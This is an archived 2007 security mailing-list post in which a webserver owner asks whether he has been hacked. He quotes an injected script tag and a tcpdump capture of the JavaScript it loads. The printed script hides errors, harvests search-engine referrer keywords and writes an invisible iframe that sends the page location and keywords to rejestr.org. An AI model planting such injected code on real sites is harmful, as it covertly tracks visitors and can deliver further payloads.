Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Security-Basics
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

been hacked ?

from [d3l user] Network Security [Permanent Link]
Subject: been hacked ?
Date: Wed, 30 May 2007 13:20:28 +0200 
while browsing through a web page hosted on my web server I have seen
in the firefox page source the following line:

<script src="http://wymiana.org/stat/script_vip.php?user=2254 "></script>


subsequently I have opened with vim the file index.php located on the 
server,
and there's no trace about that line . This happens also wit static html pages.


any idea about ?


following you can find the tcpdum stream


thanks in advance,

delUser





GET /mystat/2.js?host=wymiana.org HTTP/1.1

Host: rejestr.org

User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.3)
Gecko/20061201 Firefox/2.0.0.3 (Ubuntu-feisty)

Accept: */*

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Connection: keep-alive

Referer: http://www.mywebsite.com/



HTTP/1.1 200 OK

Date: Tue, 29 May 2007 19:46:27 GMT

Server: Apache/1.3.36 (Unix) mod_auth_passthrough/1.8
mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.2 mod_ssl/2.8.27
OpenSSL/0.9.7a

X-Powered-By: PHP/4.4.2

Connection: close

Transfer-Encoding: chunked

Content-Type: text/html



53d

function stopErrors(){return true;}window.onerror=stopErrors;
function getJS(v,r)
{
q = r.toString ();
var p = q.indexOf('?');
if (p > 0) {q = q.substring(p+1);}
var vs = q.split("&");
for (var i=0;i<vs.length;i++)
{
var pr = vs[i].split("=");
if (pr[0] == v) {return pr[1];}
}
}
var q="";
var r="";
try {
if (top.document.referrer) {r=top.document.referrer;}
else if (document.referrer)  {r=document.referrer;};
}catch (e) {};
if (r !=="")
{
if (r.indexOf("google.") !== -1) {q="q";};
if (r.indexOf("msn.com") !== -1) {q="q";};
if (r.indexOf("altavista.") !== -1) {q="q";};
if (r.indexOf("yahoo.") !== -1) {q="p";};
if (r.indexOf("netsprint.") !== -1) {q="q";};
if (r.indexOf("onet.pl") !== -1) {q="qt";};
if (r.indexOf(" wp.pl") !== -1) {q="szukaj";};
if (r.indexOf("interia.pl") !== -1) {q="q";};
if (r.indexOf("szukacz.pl") !== -1) {q="q";};
if (r.indexOf("o2.pl") !== -1) {q="qt";};
}
var vars="";
if ((r !=="") && (q!==""))
{
vars=getJS(q,r);
}
if (vars=="undefined") {vars="";};
if (vars!=="") {vars=vars +"&src=se";};
if (vars!==""){
document.write("<iframe frameborder=0 style='width:0px; height:0px'
src=\"http://rejestr.org/mystat/2.php?id="+self.location+"&topkey="+vars+"\";></iframe>")

}else
document.write("<iframe frameborder=0 style='width:0px; height:0px'
src=http://rejestr.org/mystat/2.php?id="+self.location+";></iframe>")


0

[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Security engineering services business practices & models, everette . denney
Next by Date:  Re: Forensic tool to recommend?, Fabio Cerullo
Previous by Thread:  Security engineering services business practices & models, everette . denney
Next by Thread:  Re: been hacked ?, d3l user
Indexes:  [Date] [Thread] [Top] [All Lists]